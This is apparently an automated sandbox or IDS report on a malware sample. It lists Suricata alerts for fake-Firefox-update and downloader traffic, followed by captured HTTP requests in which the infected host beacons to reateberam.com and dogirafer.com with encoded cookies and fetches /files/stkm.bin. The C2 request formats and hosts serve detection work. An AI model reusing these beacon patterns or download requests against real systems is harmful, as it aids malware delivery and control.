            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50012 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50023 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50020 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50024 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50021 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50026 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50030 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50027 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50035 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50029 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50031 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50022 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50028 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50018 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50017 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50037 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50032 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50015 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50039 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50034 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50033 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50036 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50038 -> 104.21.68.89:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50025 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50019 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49950 -> 172.67.217.190:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49934 -> 172.67.217.190:443
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hndViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hldViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hidViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hjdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hgdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hhdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hudViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hvdViRxTPtzGAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 12232Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
